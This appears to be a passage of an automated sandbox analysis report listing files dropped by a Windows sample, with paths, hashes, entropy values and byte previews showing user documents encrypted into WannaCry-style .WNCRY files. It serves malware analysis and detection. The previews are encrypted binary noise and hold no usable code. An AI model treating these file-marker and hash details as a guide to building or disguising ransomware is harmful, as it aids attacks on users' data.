                                SSDEEP:24:bk1r6Wny06HCtPp/WoKEXrLRgegSj8TlcFVT+H72bWZphBFsW6brUpAySp921D:bk1mWyXHERKE7FbgSkeFLcvBC382Rp9w
                                MD5:31F20B003E2D024B1AC075126D0A8F37
                                SHA1:3D2DB6B0E40A9DE50DE777435517AF1A6658D9CE
                                SHA-256:530A01F6EAADDBC2B8F422C6BD61FDD17498B60D91A0941B0A14212ED44A5B1A
                                SHA-512:FBC6F60D32956B5125A94C727F0F72C5C4A4638EF3EB93390E9599EFAB673093764BD2EBB3796678FD039C67CF13DA6BC1DC489B957C663F7BB72E3E2ECBF791
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....ug.98.T.;.u.....]&..w4_../. u..;.z;..Qe....B. ..r:W.,...`.msl.d.u...WQ=s.^.t.C.g.!.Q..U2ut....M.t.2.,....l"r.......H.(P......5....Ve....E0.X....9..a'p.(H......da.U.. .7I.(7....3..[.._l......p.c.......9.....C.9.!......K.E.....'...s.u.2.`...-!.................~v...Oc.d...\t.;-7..Xf..z...I}G....$.8.P.-W.0.Ta.F.s..n../.=.r.3..:b...!...B...z.S.......e.~..F... y.P.....j.p?..3Mrw;.Y..SP.8]........U....saO2 .c_.K..?.wW......`......?...<..|...nX.`k.B...h9W.)~S...f..<~....&..%n..BS0&.,\.4..N........x..j....o.F]..j.f.../.-....j..|+E'..B./.&\y.~..#.U.T......w...o@.Y...T..W}...G|..w.j.lDd.O...~.+bic-.....K....gF.X%...^..k.-..m9......b4...e.#..4.5c..t..r9..z...?..IR.F.5L.LE....q.}L#.U.'.)..K.?.h.+.v`+C..Y.u..^%Fr../.%....7Y.9..Qlp...G.Qc..@..p*.}>o...Y.E.......r..$7........S%E.......D..._.$..._k..=....O.q...j.!.L..R..e..B{<9K.x..N#....0|/..~......0...GQ..+^l*t.6....f ./.&.VU...w.\...1yL.....$..D,.{.)]W.Y..".s....&..+.fAU]?(...[c..?9.C.m..t...

                                C:\Users\user\Documents\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8221701534957955
                                Encrypted:false
                                SSDEEP:24:uCNLkPkdzyzppdZ2bhADciSZrVLASlY0Z:uCikdzag9A7SZrxVlYA
                                MD5:4AB796DF272DE32804D29D9C7379D42D
                                SHA1:7DF1C46B8BF13F8012AD5BECD36D825F32562052
                                SHA-256:4B22DD81C18186B239E1D7B899AA39A493E41B1C56C5646B3C2E25052A3FADE0
                                SHA-512:10B1BE77B3A8CD996F3F585208B28E553C5C1688F26531D975D3B8F3F374800AA444C00DD2A44219CF7E86FE010C82A1CB2B136CC3F68E8C86CE7DE74AAE17F3
                                Malicious:false
                                Reputation:unknown
                                Preview:W....8.#_.V.]...t.ym.Z...........Y..(7..j#.c..6...b...}n...P..2.2~..e;n|]6,CA.....prL.{!....6.........%...a.E...Q......n...d9.._6m..jo*...1Ei.`c...<V.'.)...I......Q.`Dl...y.A5..8...^....R..........D34...~9...."Sfk..r.%...x.;.D...<...].>....A....y...IE|.K.............>o.v.a..B.6.W...L.q.Mz..........:pI..h...(.e...S(...,.v..zi.F.j..`.........7.}...m...n2.A...nK....o.2D....N.9.s....6..a.v.D).#.... U..@.,.D .wX.=o..j.G..`...G.g..9..z ..Q1.G.5)5$s^.......=...:j.=.[(?.7{.7........./....B.......\R...f..!`....7..*|..H...c....`..S.)Y?.;.|V..^}E...{...:H.....1.?.$NX@....2...Y..*..n.....tB.....`.X.Q....|.{b.....O.X...Q)c.p....b ........mN......D}...&.JN..f\...NY../.f....moh..r....A...l.^.>..W1.G..&...a.....2...H...(Rn.....F....K...6......A.....E.$.6*.2.[.. .<?z..1.v....G].....A..m....;..9F&.0`.mgv......'~.n]T:.......4._... ..g....-Kd.&.l*..m. ..[....L....R..../.F..:u_..(....[.G.L.XV..u.n..X9....0...p...I..0l..}]`...C.0t...\+h.N.KTy...{5..V0..

                                C:\Users\user\Documents\KLIZUSIQEN.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853900768331095
                                Encrypted:false
                                SSDEEP:24:bkHK/PXa0tG2ZWsM40nOgj2m64EXY0+YdpXw30uZ2U:bkHQa0tFZW80XiJ+EXwHkU
                                MD5:31603640CD2F5F55F25C5CF3AC68F460
                                SHA1:E0847CE8F10B7389F41E47F5D2CF5FB949215388
                                SHA-256:5BE7FE85BEAFD60C10E0BF608C23AF3A45A586395E7B554700564592E81D65A2
                                SHA-512:6C6C99E4F3FC77510AEC4AB6966DD234726F0AAAD7F537855430D8907D35A088E9F03A6C55C6A4194421042982EC60CD2DD0C64004057ED9BD3FFCC398702871
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....K9...fA...JX.k.u-..=......-..\.j...Kz;..V.._.P.B....[.p@..0..yp....U.....F..c../M:...4.d...5\[.=.^...r....l..l<I[...%3..y..z.......s...~./..2.8CZ..B5./.E...@...$!.F.b.5.ebf..Hhd.._....wQ.,.._.s/..v.0.'...{o..c._......%...)..a.k...@.....x.^..5..............9-q.}&P?Pu.c.cF.....<.sbNx.E.i|7.%.,.4l...N>..x.TtNc,R-.y..k.....5...3.....E^.9QQ.t/-...oe...PB..X......a......\...._Lt..[.D...<.v.......u)......<....7.,Lh...1.Iz&..C.....A................3A.......w.50...D....y>Z...o.?....P1.j..d@....8.A......Z$0.u....dg.C..p..#...A.0.0.p..9..,.tc.a....x;.R.:....R...r.{.(.'sB....0@...U.A.:...om...Mn.S.r.m..........>..Gj.<.2H.Mzo....cj..2._d`.x.1.H0 .*F..t..eG`.Qi...^$CT..jqc...'....c..0..L2A..../H.+...@.}.{Rj.E2.-........(.:aWj|.[.m.....z..Kt.Y...A....Mc.ntshh........#=.l...A.\Va...{.J@..... .\.Q.IM.'O..?...h<...].cv._q.(.@<.'!$#.....JPpG....t.4S.....R...VnK. [.....OS....2.......].u_.#..Z.A.......#:G."......y.n...e.Ix.z..m.m~|rW.(...L.....+.G.QH

                                C:\Users\user\Documents\KLIZUSIQEN.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853900768331095
                                Encrypted:false
                                SSDEEP:24:bkHK/PXa0tG2ZWsM40nOgj2m64EXY0+YdpXw30uZ2U:bkHQa0tFZW80XiJ+EXwHkU
                                MD5:31603640CD2F5F55F25C5CF3AC68F460
                                SHA1:E0847CE8F10B7389F41E47F5D2CF5FB949215388
                                SHA-256:5BE7FE85BEAFD60C10E0BF608C23AF3A45A586395E7B554700564592E81D65A2
                                SHA-512:6C6C99E4F3FC77510AEC4AB6966DD234726F0AAAD7F537855430D8907D35A088E9F03A6C55C6A4194421042982EC60CD2DD0C64004057ED9BD3FFCC398702871
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....K9...fA...JX.k.u-..=......-..\.j...Kz;..V.._.P.B....[.p@..0..yp....U.....F..c../M:...4.d...5\[.=.^...r....l..l<I[...%3..y..z.......s...~./..2.8CZ..B5./.E...@...$!.F.b.5.ebf..Hhd.._....wQ.,.._.s/..v.0.'...{o..c._......%...)..a.k...@.....x.^..5..............9-q.}&P?Pu.c.cF.....<.sbNx.E.i|7.%.,.4l...N>..x.TtNc,R-.y..k.....5...3.....E^.9QQ.t/-...oe...PB..X......a......\...._Lt..[.D...<.v.......u)......<....7.,Lh...1.Iz&..C.....A................3A.......w.50...D....y>Z...o.?....P1.j..d@....8.A......Z$0.u....dg.C..p..#...A.0.0.p..9..,.tc.a....x;.R.:....R...r.{.(.'sB....0@...U.A.:...om...Mn.S.r.m..........>..Gj.<.2H.Mzo....cj..2._d`.x.1.H0 .*F..t..eG`.Qi...^$CT..jqc...'....c..0..L2A..../H.+...@.}.{Rj.E2.-........(.:aWj|.[.m.....z..Kt.Y...A....Mc.ntshh........#=.l...A.\Va...{.J@..... .\.Q.IM.'O..?...h<...].cv._q.(.@<.'!$#.....JPpG....t.4S.....R...VnK. [.....OS....2.......].u_.#..Z.A.......#:G."......y.n...e.Ix.z..m.m~|rW.(...L.....+.G.QH

                                C:\Users\user\Documents\NVWZAPQSQL.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.794873773630907
                                Encrypted:false
                                SSDEEP:24:zeXTUC9jdBY2nHtGz8QFm4SpV6q3bw/zxCR:yDUE9nET46q3bw/zxG
                                MD5:54246A9F0FCEC9ED45D9A3C2B70B02AF
                                SHA1:B1E03E202D0C97D0DA7A0A6516345C813E13A2D3
                                SHA-256:F9305FD37048185C1D1A5D3ED3DE5AE3728C67944145B9456C936567DB377A01
                                SHA-512:3B5C5B792E8052F0A99DD8F921A03E68AAD374E842DF7EE15ABE77DF83BBA5705BD0997D7F62A3F49CFF1F4F92BE4114E6EF557A702D0DB5967D195BFD274864
                                Malicious:false
                                Reputation:unknown
                                Preview:.....S..p.....M...9..k......q.#.{1........p..........HbH..].v..E'u.p+.......)..........mL1....pk.>..U....9-i...m...-%&...C..V.$.7.f.....u.=.'ztI.\.....M...@]..x4'.......[....Q?[...t.V.....:H.....`d...v.'7r..D`...b....R~1..+..Z.....^....9.V.c[cH.........~y..?..8...f...i+..eX....d..a..s...(.5$bO.+...in,0;..".C3..Wj.."ep)-y.h&8A..&..G.`..a.D.y.~3.......};d[.0OZ..G...g...j%.[!|o..Q!......VS...L..Z...M[..[.g...$..Gk*1.~..|rh..~JQ.N:m6..P@....,}..1.>6.#..s..um.....r..83.."D....3$o.$..L......Qj..`}J./..h.a....e/.vM.+9"_..{-..T]g...M...g;..C.]~...KI0...E.R.=...k&.....k.kv..K.^.4y....e.A.....*~....k..]'i.)N.6...G.<\..TV./.~3..<......z".]...1%.<+.P ...|KX.c.\.O.a.b........%.4.......6...<...-..SKv...U..!..Z...>.0.@..G. A1."g&..n...ae.B.:...A`F.,..F..Y.....iR.k..tk`......T..:....0.=}.V!...r../......Gn..!.-yt3~.V........K./.J....C.....5.D]H.,......2.L...4..Y.....|.?R_...rC4......a..u.e...t.C.9Gz..<^.^...`"#b.....\.BL'OH....!.A...|..8l..& y.6

                                C:\Users\user\Documents\NVWZAPQSQL.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8544019191671675
                                Encrypted:false
                                SSDEEP:24:bk2gKUrS+kUl85Ons2aIGI6/h5PQEHAtFOXik9izIwkNqBC1+618Rsa8n:bkRbr5r88ns2aJPFHwclhNqE+XRfU
                                MD5:E97B0BBE609BD53FDAC2974602EF3F32
                                SHA1:9D8E980903142D49C9DD1C81D0ECC3D2D5F1BEF2
                                SHA-256:66EF7F5E0C781BED8C85FE19345FF43F77A0555860D94E6376456A249775CD48
                                SHA-512:96CB6CA4D13F8E9D1F31D04AD820C1649B0AEC007543277D1C826FFA38002770341787E64063D69504664F7977ABD4052E7B7495DE8906EC045937C65E79601C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........9M..Q.......c. ~.._..V...*6.N.f@s|...Qm...PU......{P.M....3.....0...A...I...#m.D+.....vc.5&u..c?..1E*..6y.e.#.4T3.....rTC+~.I.Xh..3.n.4.zZ[m.Tl.8W......._mtBE]7..s...jn.....S..,.FCO..p..].h......W[.d.l..x;2.$....`..g.;.(7xg..8.......Ao..ZQ8@.............=..0D....t.~.6...K"n....V?.cUI.....; .i\...w4*.mS"....f....5=....".F....]..dI~UY.a.F.a..L5..7.ls..SB../...gW..qx..nc.q.F...+s.........JDB .?3h..q.U.D`?.../..m...~u.j..gi...0RV;..q.B.`.2I.3aF...4}4.Y...4..T....4u....%....BlA.L.;.......d...cc..W.v>.L...?.OH...4....._zz.....!..f......{..j....(...5.}..j..B<c....P..6.D'.n'...1..j.i.sz.o...U.M+B...U.........x...v)".R.n ....(G...Zk'.a.g{...+....0t..:."...d.:]...m./I.y".%.Vn..h>....)rj...'....6%)v.}6.H/.........O./.v.".d.o......wc....x..".1......4-Ug.WA..Wj.At....ee...1..U:2..Af...L..@..........]..i.. .n.............E....X.. \......o.L.Y/..C....:...P.7\...=..HIc1|..[t..`.....2.+.B..kV`"H....2/N.....A.!..%)wZ...o^.u).....BA.....}

                                C:\Users\user\Documents\NVWZAPQSQL.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8544019191671675
                                Encrypted:false
                                SSDEEP:24:bk2gKUrS+kUl85Ons2aIGI6/h5PQEHAtFOXik9izIwkNqBC1+618Rsa8n:bkRbr5r88ns2aJPFHwclhNqE+XRfU
                                MD5:E97B0BBE609BD53FDAC2974602EF3F32
                                SHA1:9D8E980903142D49C9DD1C81D0ECC3D2D5F1BEF2
                                SHA-256:66EF7F5E0C781BED8C85FE19345FF43F77A0555860D94E6376456A249775CD48
                                SHA-512:96CB6CA4D13F8E9D1F31D04AD820C1649B0AEC007543277D1C826FFA38002770341787E64063D69504664F7977ABD4052E7B7495DE8906EC045937C65E79601C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........9M..Q.......c. ~.._..V...*6.N.f@s|...Qm...PU......{P.M....3.....0...A...I...#m.D+.....vc.5&u..c?..1E*..6y.e.#.4T3.....rTC+~.I.Xh..3.n.4.zZ[m.Tl.8W......._mtBE]7..s...jn.....S..,.FCO..p..].h......W[.d.l..x;2.$....`..g.;.(7xg..8.......Ao..ZQ8@.............=..0D....t.~.6...K"n....V?.cUI.....; .i\...w4*.mS"....f....5=....".F....]..dI~UY.a.F.a..L5..7.ls..SB../...gW..qx..nc.q.F...+s.........JDB .?3h..q.U.D`?.../..m...~u.j..gi...0RV;..q.B.`.2I.3aF...4}4.Y...4..T....4u....%....BlA.L.;.......d...cc..W.v>.L...?.OH...4....._zz.....!..f......{..j....(...5.}..j..B<c....P..6.D'.n'...1..j.i.sz.o...U.M+B...U.........x...v)".R.n ....(G...Zk'.a.g{...+....0t..:."...d.:]...m./I.y".%.Vn..h>....)rj...'....6%)v.}6.H/.........O./.v.".d.o......wc....x..".1......4-Ug.WA..Wj.At....ee...1..U:2..Af...L..@..........]..i.. .n.............E....X.. \......o.L.Y/..C....:...P.7\...=..HIc1|..[t..`.....2.+.B..kV`"H....2/N.....A.!..%)wZ...o^.u).....BA.....}

                                C:\Users\user\Documents\NYMMPCEIMA.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.829132987519543
                                Encrypted:false
                                SSDEEP:24:5ABY+kGVOEROgdZTqqDE+6cg0ZB+cbVwIwfh4kZrjtfx97c:SBuGLzVuc+Iwf6urJ7c
                                MD5:58401FB12FBB64207691546CC1D1C8DE
                                SHA1:20EDCA403D3F497EAB64BA1F9B3FCE75741EC8E7
                                SHA-256:D0ECD85F192A948EAA0A378BC6AF08E27E43C3BE51ACCFA296C30AC36833F01B
                                SHA-512:33032E4FFD554305065A0E433855242DAB29EE7C6A4B55E7245D40DCB2772D22E97533F24AC7F60338CDE10DAB992C9795CC28B20621F197E0223917EBEEFB30
                                Malicious:false
                                Reputation:unknown
                                Preview:.....is.YJr1.._,.j........Vg.}.#.mLJU.\..0e.M.a.C...4...r.EW.8..T....r..+I....zK.I.N...9)...a...B..D......WS.[.G..?Nx^.tZ'G..17G.Z.W,z...'@k..p....`...i`p. s..Q..2'...f...N....8GJ.K.5...i.#.-.e.q.P.L.-..X.Q...O\.v..R..V.......0~..q......[.A.=.e..--#W....5!.\``4..v....{..o....'.hf...*..V&......>..9.4.x.zk....t.9..p.:g..WC.=..;7..7..P..G..FF...g....F.2dB[.F0S.iJ.1y.!-w..~.6w0.;w0.Ok%{\P.....{.)..lW..-...Q..vP..|s-....ev..e.....!..f.e.#...W.{5Zq[.pv.o..9Vy....R..*../..Y(|..%9.?..........G.......j|.6.....w.G.g.H..|....fb.A;).[.$.C.-#.\..JY....j..W...f!o..2..T..\(E.i...}JCT.oT.o..G.,n.V....K. ...p..]....Z.Z..r.....pes1.....x&.X.l...T%..vZ.....B.^..e(.V._....Uv.w.I.........Sq...y......v..m....../..<.28...1..B...pL.2..pQ.N">vVI.`)@.. .4..|.....9_....a......p]....p.Q.......7..,..Y..6"S...z:<....HI.<..;`...a...L.~...n...<.X.n..".z....gj.!.I.+.w8....{..(..Fc.....5..........)..sr3.....Z.|`.[`..c....._"..g..d.=..a..t.l.S_|g.^>...b._p)]Ty#m.}..X.Fe...9...D.

                                C:\Users\user\Documents\NYMMPCEIMA.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.866275321704982
                                Encrypted:false
                                SSDEEP:24:bk3XHQ5P3sSVISpImwRuGQHZWATNOuQq+l2/pfODISEBqm82SjKzQVgYd5:bk3XQ5P3sSVDpImwRu1HZWAT4aRQS82W
                                MD5:4878C9A78C61720AED3223F191E626C7
                                SHA1:A5E944E5D321B96D768693840FAE2E385A564AE5
                                SHA-256:F9506305AE1D2CC4038C7DB64F92C44D3C993C054EF2420961DE16BE48126FA9
                                SHA-512:F224BF0328CE2D6ED591BE3EECCC3D656F3C35493F63F8327CA58A0FD74D3CD4E8EED5DDAD107930BA0C7F243740DA21A7E23A4E4AFA2134F658DF9CE2AC3808
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....>@...($.....'.iL..)c....M...s.Z.bb.....y/fV......E.P..=..]a_.....RM.=hqF..p.'.].d.-....2.T....U.0.~-3k..MN.........R.r....x8.~.W^M.je.I......@kla.{.0.,'.%.o........!.t.n>6M.w....m..>..s.s..2:.....=...F.8.]....\..\v..].Y..,..=.&(`..z.Cr.K.Zy.}.v6............`.gZ...^... ....E.R$.7T.Q`.....T. U9...p.jP..>.4,.=..M.=....l...^..G.3..;..|.?...bL...L....e.b.o.e...d.Yl.`..=U.k.G]!..d`...r....W..,...9#..$}.r!..jh".J"..6<N....VB.ku.D.j%bn._.ML.J..8.a.d.....h.g.i....=......9(.../)T.."D.8.;A....S.U.j...q...V...\.kX.T..'.H.......*8k....&.Kx..C......gt.tAa.,....#:..R`1....t...*..A....Wy....Y..] ......[.%7...e.RGV.M:A'.......`..M..\....2=.F....d....1;v.-.l...+AK.A..c..T.Z......w[cq.!P.2.........e....PV-...J./.@.f`..$<..3.C..a.cG.u....b..f.9$Js.KT.4.?....y.)..+.V.nx`....SQT.ZJ...&dM....[.%-Bu1T.|.0._,.8.;..Z.....1.91.....s.O...*....~.a..N.............L...w.%....Yd.%..E.W...P.l5?3.)5...^>'T.:0.'.,.:.I1x.H..7H...xN4../X.._i..WT...2k.........}..v..K<..

                                C:\Users\user\Documents\NYMMPCEIMA.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.866275321704982
                                Encrypted:false
                                SSDEEP:24:bk3XHQ5P3sSVISpImwRuGQHZWATNOuQq+l2/pfODISEBqm82SjKzQVgYd5:bk3XQ5P3sSVDpImwRu1HZWAT4aRQS82W
                                MD5:4878C9A78C61720AED3223F191E626C7
                                SHA1:A5E944E5D321B96D768693840FAE2E385A564AE5
                                SHA-256:F9506305AE1D2CC4038C7DB64F92C44D3C993C054EF2420961DE16BE48126FA9
                                SHA-512:F224BF0328CE2D6ED591BE3EECCC3D656F3C35493F63F8327CA58A0FD74D3CD4E8EED5DDAD107930BA0C7F243740DA21A7E23A4E4AFA2134F658DF9CE2AC3808
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....>@...($.....'.iL..)c....M...s.Z.bb.....y/fV......E.P..=..]a_.....RM.=hqF..p.'.].d.-....2.T....U.0.~-3k..MN.........R.r....x8.~.W^M.je.I......@kla.{.0.,'.%.o........!.t.n>6M.w....m..>..s.s..2:.....=...F.8.]....\..\v..].Y..,..=.&(`..z.Cr.K.Zy.}.v6............`.gZ...^... ....E.R$.7T.Q`.....T. U9...p.jP..>.4,.=..M.=....l...^..G.3..;..|.?...bL...L....e.b.o.e...d.Yl.`..=U.k.G]!..d`...r....W..,...9#..$}.r!..jh".J"..6<N....VB.ku.D.j%bn._.ML.J..8.a.d.....h.g.i....=......9(.../)T.."D.8.;A....S.U.j...q...V...\.kX.T..'.H.......*8k....&.Kx..C......gt.tAa.,....#:..R`1....t...*..A....Wy....Y..] ......[.%7...e.RGV.M:A'.......`..M..\....2=.F....d....1;v.-.l...+AK.A..c..T.Z......w[cq.!P.2.........e....PV-...J./.@.f`..$<..3.C..a.cG.u....b..f.9$Js.KT.4.?....y.)..+.V.nx`....SQT.ZJ...&dM....[.%-Bu1T.|.0._,.8.;..Z.....1.91.....s.O...*....~.a..N.............L...w.%....Yd.%..E.W...P.l5?3.)5...^>'T.:0.'.,.:.I1x.H..7H...xN4../X.._i..WT...2k.........}..v..K<..

                                C:\Users\user\Documents\PALRGUCVEH.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7698050218739
                                Encrypted:false
                                SSDEEP:24:RTUNDJVyJG+Os7xGq7IB5Ik+RLaW1zJJVw2H:Rqy4w1tawFjPH
                                MD5:2B95D8A00100E7B623B138C132726CA2
                                SHA1:70FBAF237B427DAD02CAA6CA26340B098F9BE387
                                SHA-256:2B6DFF11D47FB42766AE1E4CB48A13634F5582E9AECA78BF98C4402225B4B94D
                                SHA-512:6A9E821E53F9D3E7B16E7CC30FC95404F90A402E7C85A89C516D4F6B0965D7B53FA99DE28107600EFEF21581D12EB37A7F7C91AA7551B010BA8709C648368C3C
                                Malicious:false
                                Reputation:unknown
                                Preview:......"...jW.....u...f.@......1...[.R..Q....g....uX^.hKL.+..F#...O......H..QK`.U...z.....v....y.S .L..0.'.XKPt..6..DQ.^...$.6.4....t..1ba.........]zl?>l..........{c{:I%.uG.....P.....Y;A....9......2...%+p...g....L.. f.(..2R"..h.x..O.%.(.aO.l.# ..p..........~.R....y^.....j...*..9...``.h..G.[....Ow|.a.{....?......1.[...r.k...9.....w...|.~..Fnl..a...2..C.b%....]..*..w..@.........|...rmD......O......}..jp..A.~..R"a...])G...x...n..ji....a'.R.nS..&..l6..S?.....MS[]zD\..|E.h.E..c..?.............d..&......R\..u......h...{AkI.fu.....Z..'...s.......g....%..r..).LT..cw......LtR.0..R..}.#...!Gw.FQ.B...@C..x...y............m..b......?.Y.[.R".PY...~5...O....d...d...a.......f.d.u.!.I.k....|x..n.3I.....b..6#.......J..J.DOV.A....=.......ZL.U..'.....(.g.'d[...7F..4.."..-&.......vO.h.?.;G.......`*!r.U..osB...;u....U..Sx.`&3v^.1.GE.A...... .`|.1,...z.b.....wI.:.....==..VN.iX.5.2......j....Rn.F..\y0PG..6.Z.....)..2.;.7'...HL.Z.k........zAQ....1.m,f.

                                C:\Users\user\Documents\PALRGUCVEH.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827938735234342
                                Encrypted:false
                                SSDEEP:24:bkXxLQh7NhvRQXpGHuQBPh6q9qn6UtCOBbfvzH9aULElkd35ZCIVCSRjCLu5:bkd8BsZGHrr6Ln6UpB7zH9dByoCSRjQ2
                                MD5:2C09A8AE375209655BC14EFE4D4B706F
                                SHA1:85919D205D320A65E36412A9B97570901DACC712
                                SHA-256:72E1F4152BE1A9F8B78D7D42F32E5069DD93B140E1156CA3FDFB7B2008CDCA32
                                SHA-512:42F9943A78757964741B9F101D11F8F36D2A041D590021484A2F9EEBCC084D5E3485F44CC1462E582C691422404B415389EF5E750ADBEE31F6A9D85638E74B8D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......c....x-..Lj..B'.......0.$.x.w6..O.*D.....Br...|.7.od.....,J..&.as.....U.....^LS..F...7]..d.A.<.5.J...yv6.zQ....zkWIA.e.;));....`$........aH....[..-4..v..>.q\,..M~.G.'....pj...>t...;^:.f.(L..o2......G9Q.Y.zpg..r...a..c...+.n2..610m.../;6b>.]...............l...O[.x...........!@~.%.....\$z.w...*.j[..Y......Lk..,.v).u..*../5...W5~W..\D....\i.c.4 .W...O4.....l.z..|e....cNx.~.piVV.z..|...o..i.X..Y.{5..}..JF..K.....F.B|x...t...X...AIkQ>~..VW..]..7u.(M.J!R@.|..V..6....W.OaA....d._At..wT..N.."2<TD.....i...i.......f...........G....^j.S.4.-.Cr...~.&........6.8..5v...H-........uQC<...h.6F,.@qs..d5....B.kj.D...jBYo...Z@z.]....E.ez.i?'l.tb.u..............B.`....WVP..O..0Z~..&....\...<%.]..[..._...V....l.t....q...M........B.b.G.}w}.b2..z...4\.wz..W.FM...he.2.....p....oQ>t.%.\....=.......JJ.r.>,.........C.\(...Y.&V.#.g..R..i...E!z...G."[R...x...urt...a2x8L....#...!.y.!Nn.......|..f..uj..1V.n...3......My.j.H......M.=[..#...-.y<..`..`^.......%u

                                C:\Users\user\Documents\PALRGUCVEH.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827938735234342
                                Encrypted:false
                                SSDEEP:24:bkXxLQh7NhvRQXpGHuQBPh6q9qn6UtCOBbfvzH9aULElkd35ZCIVCSRjCLu5:bkd8BsZGHrr6Ln6UpB7zH9dByoCSRjQ2
                                MD5:2C09A8AE375209655BC14EFE4D4B706F
                                SHA1:85919D205D320A65E36412A9B97570901DACC712
                                SHA-256:72E1F4152BE1A9F8B78D7D42F32E5069DD93B140E1156CA3FDFB7B2008CDCA32
                                SHA-512:42F9943A78757964741B9F101D11F8F36D2A041D590021484A2F9EEBCC084D5E3485F44CC1462E582C691422404B415389EF5E750ADBEE31F6A9D85638E74B8D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......c....x-..Lj..B'.......0.$.x.w6..O.*D.....Br...|.7.od.....,J..&.as.....U.....^LS..F...7]..d.A.<.5.J...yv6.zQ....zkWIA.e.;));....`$........aH....[..-4..v..>.q\,..M~.G.'....pj...>t...;^:.f.(L..o2......G9Q.Y.zpg..r...a..c...+.n2..610m.../;6b>.]...............l...O[.x...........!@~.%.....\$z.w...*.j[..Y......Lk..,.v).u..*../5...W5~W..\D....\i.c.4 .W...O4.....l.z..|e....cNx.~.piVV.z..|...o..i.X..Y.{5..}..JF..K.....F.B|x...t...X...AIkQ>~..VW..]..7u.(M.J!R@.|..V..6....W.OaA....d._At..wT..N.."2<TD.....i...i.......f...........G....^j.S.4.-.Cr...~.&........6.8..5v...H-........uQC<...h.6F,.@qs..d5....B.kj.D...jBYo...Z@z.]....E.ez.i?'l.tb.u..............B.`....WVP..O..0Z~..&....\...<%.]..[..._...V....l.t....q...M........B.b.G.}w}.b2..z...4\.wz..W.FM...he.2.....p....oQ>t.%.\....=.......JJ.r.>,.........C.\(...Y.&V.#.g..R..i...E!z...G."[R...x...urt...a2x8L....#...!.y.!Nn.......|..f..uj..1V.n...3......My.j.H......M.=[..#...-.y<..`..`^.......%u

                                C:\Users\user\Documents\PIVFAGEAAV.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.833426527863054
                                Encrypted:false
                                SSDEEP:24:PtK/RyPrlQ00EpkwTG4xw1v4CWZceDJ4ahAx1Kj14hZIc45Bvsi:P0arlQ/Epe6wSZceDJ8x1KZ4Hu9R
                                MD5:2D0B8257AD7B0279A7354DEBE833A3B9
                                SHA1:D86E905E8366A4D5615CBB0F2F90F78760F143CD
                                SHA-256:8EE8D2735750FE840E58C14D8242C3F9799FECE1768016F0C29473C9AAABEFF2
                                SHA-512:145CDB125516C1A24D4B63B1509B503DA901EF05D303F841E6DF20D935DEEAA2446070C38C91A6E23145B30443D2ACE1A4C92D2D7EC3C2FECF03D0F057425D17
                                Malicious:false
                                Reputation:unknown
                                Preview:...)x..z...u....q4.R...-b.^..(..'k..D...Ad..B[.8..f.1BE.g....._.C.G}|.......BAg.......Z.0..k8...&:~..'..;g..+..|Nd.@..........fk..........&.{B.\.....Q........q.Z.su^..ZBSO...=9.T.......)I...z.n.G..S9.a...m'.*.....XM.....m.n..Xe..u#.,.V..w.y.;..B.....5.z.(38+...Lbh.f...L...=..u......U..u?..=...........9r5....Q.\._....a...Vx.4..i.A..c.."....knp.O._..mi......z.#.F+.|...m7A%w...4.l>.k'.6.......xn.....J.A.~I.v.x' c.+;...=C/..+yT....1......B...q.Is...)o.......*^....5e..1.>.4..N.........W.F..`Q....d...G.Y.....g[B...6*...._`!L..oQ.M.'\l.J...q.:....N#3.ry..dg.eF+.&K.qG.Q.B...en.z..\*>j..4/.&.....e.........N...?.R.7.&....Vil.l_..m!....|l1.....:. .:...s..2..v.,.......#.._\^.J.77....Y..B..l&.#.x.......].e......f....i..=E?.7}.^..G..... .....C.;..H1..;?k.#!t....T..... .P....w....D....R........3.P.I...../..\.[.....=j..'V.....(.E..1j;.C...2zu.t....m...b....A." 